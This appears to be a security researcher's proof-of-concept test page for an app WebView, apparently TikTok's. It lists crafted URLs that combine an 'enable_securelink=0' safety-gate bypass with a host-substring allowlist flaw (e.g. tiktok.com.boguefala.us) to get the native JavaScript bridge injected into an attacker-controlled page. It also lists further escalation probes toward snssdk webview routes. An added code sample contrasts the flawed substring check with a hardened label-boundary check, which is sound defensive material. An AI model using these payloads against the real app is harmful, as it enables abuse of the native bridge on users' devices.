SCC bypass → bridge chain — lrd0036

CONFIRMED: enable_securelink=0 loads arbitrary URLs past the safety gate. Now chaining the p_checkURLInAllowDomain substring flaw (host contains an allowlisted token) to get the native bridge injected. WIN = red page renders AND its webkit.messageHandlers box is non-empty.

1 · confirmed SCC bypass (baseline — should load, bridge likely empty)

boguefala.us/poc &enable_securelink=0

2 · FULL CHAIN — SCC off + host-substring for bridge injection

tiktok.com.boguefala.us/poc &enable_securelink=0
…tiktok.com.boguefala.us + param both places

3 · other allowlist tokens (if tiktok.com isn't the allowlisted one)

tiktokv.com.boguefala.us/poc &enable_securelink=0
webcast.tiktok.com.boguefala.us/poc &enable_securelink=0
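
The host-substring flaw that cases 2 and 3 rely on, shown next to a label-boundary check a defender would use instead. This is an added example, not code from the app or from this page: both function bodies, the allowlist entries and the https-only rule are assumptions; only the hostnames come from the page.

```javascript
// Added example. ALLOWED_DOMAINS and both checks are assumptions,
// not code recovered from the app.
const ALLOWED_DOMAINS = ["tiktok.com", "tiktokv.com"]; // assumed entries

// Flawed pattern: passes when the host merely CONTAINS an allowlisted token.
function hostContainsToken(rawUrl) {
  const host = new URL(rawUrl).hostname;
  return ALLOWED_DOMAINS.some((d) => host.includes(d));
}

// Hardened: parse once, require https (assumed policy), reject userinfo,
// and match the host exactly or on a label boundary, never as a substring.
function hostInAllowDomain(rawUrl) {
  let u;
  try {
    u = new URL(rawUrl);
  } catch {
    return false; // unparseable input never gets the bridge
  }
  if (u.protocol !== "https:") return false;
  if (u.username || u.password) return false;
  const host = u.hostname.toLowerCase().replace(/\.$/, ""); // drop root dot
  return ALLOWED_DOMAINS.some((d) => host === d || host.endsWith("." + d));
}

// Constructed inputs; the boguefala.us hostnames are the ones on this page.
const SAMPLES = [
  "https://www.tiktok.com/poc",
  "https://tiktok.com.boguefala.us/poc",
  "https://tiktokv.com.boguefala.us/poc",
  "https://webcast.tiktok.com.boguefala.us/poc",
  "https://boguefala.us/poc",
  "https://nottiktok.com/poc", // catches an endsWith() without the leading dot
];

// Run both checks over every sample so the disagreement is visible per row.
function compare() {
  return SAMPLES.map((url) => ({
    url,
    substring: hostContainsToken(url),
    hardened: hostInAllowDomain(url),
  }));
}

console.table(compare());
```

Rows where `substring` is true and `hardened` is false are the hosts that would receive the bridge only because of the substring match.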

4 · Safari controls

tiktok.com.boguefala.us/poc in Safari

5 · bounded escalation probes

privilege probe: origin/CORS/storage isolation
chain probe: JS -> snssdk webview route
chain probe: iframe -> snssdk webview route